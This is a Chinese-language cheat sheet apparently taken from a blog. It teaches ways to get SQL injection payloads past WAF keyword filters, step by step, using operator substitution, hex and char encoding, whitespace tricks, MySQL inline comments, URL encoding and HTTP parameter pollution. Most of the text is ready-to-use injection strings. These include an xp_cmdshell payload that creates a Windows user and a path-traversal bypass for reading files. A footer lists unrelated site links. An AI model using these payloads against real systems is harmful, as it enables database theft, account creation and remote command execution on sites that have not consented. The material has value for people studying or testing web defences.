关于SQL注入绕过的一些知识点

一、 绕过waf思路

从第一步起，一点一点去分析，然后绕过。

1、过滤 and,or

preg_match('/(and|or)/i', $id)
Filtered injection: 1 or 1 = 1 1 and 1 = 1
Bypassed injection: 1 || 1 = 1 1 && 1 = 1

2、过滤 and, or, union

preg_match('/(and|or|union)/i', $id)
Filtered injection: union select user, password from users
Bypassed injection: 1 || (select user from users where user_id = 1) = 'admin'

3、过滤 and, or, union, where

preg_match('/(and|or|union|where)/i', $id)
Filtered injection: 1 || (select user from users where user_id = 1) = 'admin'
Bypassed injection: 1 || (select user from users limit 1) = 'admin'

4、过滤 and, or, union, where, limit

preg_match('/(and|or|union|where|limit)/i', $id)
Filtered injection: 1 || (select user from users limit 1) = 'admin'
Bypassed injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'

5、过滤 and, or, union, where, limit, group by

preg_match('/(and|or|union|where|limit|group by)/i', $id)
Filtered injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
Bypassed injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users ) = 1

6、过滤 and, or, union, where, limit, group by, select

preg_match('/(and|or|union|where|limit|group by|select)/i', $id)
Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
Bypassed injection: 1 || 1 = 1 into outfile 'result.txt'
Bypassed injection: 1 || substr(user,1,1) = 'a'

7、过滤 and, or, union, where, limit, group by, select, ‘

preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)
Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
Bypassed injection: 1 || user_id is not null
Bypassed injection: 1 || substr(user,1,1) = 0x61
Bypassed injection: 1 || substr(user,1,1) = unhex(61)

8、过滤 and, or, union, where, limit, group by, select, ‘, hex

preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)
Filtered injection: 1 || substr(user,1,1) = unhex(61)
Bypassed injection: 1 || substr(user,1,1) = lower(conv(11,10,36))

9、过滤 and, or, union, where, limit, group by, select, ‘, hex, substr

preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)
Filtered injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
Bypassed injection: 1 || lpad(user,7,1)

10、过滤 and, or, union, where, limit, group by, select, ‘, hex, substr, 空格

preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)
Filtered injection: 1 || lpad(user,7,1)
ypassed injection: 1%0b||%0blpad(user,7,1)

二、正则绕过

根据正则的的模糊匹配特性绕过，比如过滤了'='

filtered injection: 1 or 1 = 1

Bypassed injection: 1 or 1,1 or ‘1',1 or char(97)

eg:
filtered injection:  1 union select 1, table_name from information_schema.tables where table_name = 'users'
Bypassed injection:  1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z'
Bypassed injection:  1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122)
Bypassed injection:  1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7a
Bypassed Injection:  1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273

三、通用绕过

1.注释符

?id=1+un//ion+se//lect+1,2,3–

2.大小写

?id=1+UnIoN//SeLecT//1,2,3–

3.关键字替换

有些waf等使用preg_replace替换了SQL关键字

?id=1+UNunionION+SEselectLECT+1,2,3--
?id=1+uni%0bon+se%0blect+1,2,3--

有时候注释符'/**/‘可能被过滤，也可以使用%0b绕过

Forbidden: http://localhost/id/1/**/||/**/lpad(first_name,7,1).html
Bypassed : http://localhost/id/1%0b||%0blpad(first_name,7,1).html

4.编码

一个经典的脚本：Nukesentinel.php

// Check for UNION attack
  // Copyright 2004(c) Raven PHP Scripts
  $blocker_row = $blocker_array[1];
  if($blocker_row['activate'] > 0) {
  if (stristr($nsnst_const['query_string'],'+union+') OR \
  stristr($nsnst_const['query_string'],'%20union%20') OR \
  stristr($nsnst_const['query_string'],'*/union/*') OR \
  stristr($nsnst_const['query_string'],' union ') OR \
  stristr($nsnst_const['query_string_base64'],'+union+') OR \
  stristr($nsnst_const['query_string_base64'],'%20union%20') OR \
  stristr($nsnst_const['query_string_base64'],'*/union/*') OR \
  stristr($nsnst_const['query_string_base64'],' union ')) { // block_ip($blocker_row);
   die("BLOCK IP 1 " );
  }
  }

Forbidden: http://localhost/php/?/**/union/**/select
Bypassed : http://localhost/php/?/%2A%2A/union/%2A%2A/select
Bypassed : http://localhost/php/?%2f**%2funion%2f**%2fselect

5.缓冲区溢出

http://localhost/news.php?id=1+and+(select 1)=(select 0xA*1000)+union+select+1,2,version(),database(),user(),6,7,8,9,10–

6.内联注释(mysql)

http://localhost/news.php?id=1/*!UnIoN*/SeLecT+1,2,3--
http://localhost/news.php?id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--

四、高级绕过

1.HPP（http参数污染)

举个例子：

index.php?par1=val1&par1=val2
| web server | par1 |
| :— | :— |
| ASP.NET/IIS | val1,val2 |
| ASP/IIS | val1,val2 |
| PHP/Apache | val2 |
| JSP/Tomcat | val1 |

eg:

在ASP/ASP.NET的环境下

Forbidden: http://localhost/search.aspx?q=select name,password from users
Bypassed : http://localhost/search.aspx?q=select name&q=password from users
Bypassed : http://localhost/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/users
Bypassed : http://localhost/news.aspx?id=1'; /*&id=1*/ EXEC /*&id=1*/ master..xp_cmdshell /*&id=1*/ net user test test /*&id=1*/ --

2.HPC(http参数污染)

RFC2396定义了如下一些字符：

Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' ()
Reserved : ; / ? : @ & = + $ ,
Unwise : { } | \ ^ [ ] `

不同的Web服务器处理处理构造得特殊请求时有不同的逻辑：

| Query String | Apache/2.2.16,PHP/5.3.3 | IIS6/ASP |
| :— | :— | :— |
| ?test[1=2 | test_1=2 | test[1=2 |
| ?test=% | test=% | test= |
| ?test%00=1 | test= | test=1 |
| ?test=1%001 | NULL | test=1 |
| ?test+d=1+2 | test_d=1 2 | test d=1 2 |

eg:

Forbidden: http://localhost/?xp_cmdshell
Bypassed : http://localhost/?xp[cmdshell
Forbidden: http://localhost/test.asp?file=../flag.txt
Bypassed : http://localhost/test.asp?file=.%./flag.txt
Forbidden: http://localhost/news.asp?id=10 and 1=0/(select top 1 table_name from information_schema.tables)
Bypassed : http://localhost/news.asp?id=10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)

总结

以上就是关于sql注入绕过的技巧总结，希望本文的内容对大家的学习或者工作能带来一定的帮助，如果有疑问大家可以留言交流，谢谢大家对的支持。

# sql注入绕过  # sql注入绕过waf  # sql注入绕过过滤  # 防止xss和sql注入:JS特殊字符过滤正则  # 一个过滤重复数据的 SQL 语句  # MySQL注入绕开过滤的技巧总结  # SQL注入中绕过 单引号 限制继续注入  # SQL注入绕过的技巧总结  # 多列复合索引的使用 绕过微软sql server的一个缺陷  # SQL Server简单模式下误删除堆表记录恢复方法(绕过页眉校验)  # Mysql如何巧妙的绕过未知字段名详解  # SQL注入技巧之显注与盲注中过滤逗号绕过详析  # 可以使用  # 谢谢大家  # 举个例子  # 有疑问  # Injection  # x7a  # se  # lect  # ion  # tables  # blpad  # code  # lpad  # ypassed  # filtered  # table_name  # information_schema  # char  # localhost  # first_name 

相关文章： 如何通过西部数码建站助手快速创建专业网站？  香港服务器部署网站为何提示未备案？  宝塔新建站点为何无法访问？如何排查？  如何选择美橙互联多站合一建站方案？  ,想在网上投简历，哪几个网站比较好？  手机网站制作与建设方案,手机网站如何建设？  如何在Windows服务器上快速搭建网站？  如何注册花生壳免费域名并搭建个人网站？  建站之星2.7模板：企业网站建设与h5定制设计专题  武清网站制作公司,天津武清个人营业执照注销查询系统网站？  TestNG的testng.xml配置文件怎么写  网站制作员失业,怎样查看自己网站的注册者？  深圳网站制作培训,深圳哪些招聘网站比较好？  如何快速搭建高效服务器建站系统？  如何用PHP快速搭建CMS系统？  整人网站在线制作软件,整蛊网站退不出去必须要打我是白痴才能出去？  建站主机选哪种环境更利于SEO优化？  网站制作培训多少钱一个月,网站优化seo培训课程有哪些？  PHP 500报错的快速解决方法  韩国代理服务器如何选？解析IP设置技巧与跨境访问优化指南  唐山网站制作公司有哪些,唐山找工作哪个网站最靠谱？  简易网站制作视频教程,使用记事本编写一个简单的网页html文件？  在线ppt制作网站有哪些,请推荐几个好的课件下载的网站？  安徽网站建设与外贸建站服务专业定制方案  建站之星官网登录失败？如何快速解决？  开封网站制作公司,网络用语开封是什么意思？  如何在阿里云服务器自主搭建网站？  建站上市公司网站建设方案与SEO优化服务定制指南  建站之星各版本价格是多少？  导航网站建站方案与优化指南：一站式高效搭建技巧解析  高防服务器如何保障网站安全无虞？  公司网站的制作公司,企业网站制作基本流程有哪些？  新网站制作渠道有哪些,跪求一个无线渠道比较强的小说网站，我要发表小说？  详解jQuery停止动画——stop()方法的使用  如何制作网站标识牌,动态网站如何制作（教程）？  相册网站制作软件,图片上的网址怎么复制？  如何在阿里云香港服务器快速搭建网站？  小建面朝正北，A点实际方位是否存在偏差？  如何快速生成专业多端适配建站电话？  金*站制作公司有哪些,金华教育集团官网？  如何实现建站之星域名转发设置？  seo网站制作优化,网站SEO优化步骤有哪些？  建站之星在线客服如何快速接入解答？  ,有什么在线背英语单词效率比较高的网站？  如何选择高效响应式自助建站源码系统？  5种Android数据存储方式汇总  c++怎么使用类型萃取type_traits_c++ 模板元编程类型判断【方法】  建站一年半SEO优化实战指南：核心词挖掘与长尾流量提升策略  如何用y主机助手快速搭建网站？  正规网站制作公司有哪些,目前国内哪家网页网站制作设计公司比较专业靠谱？口碑好？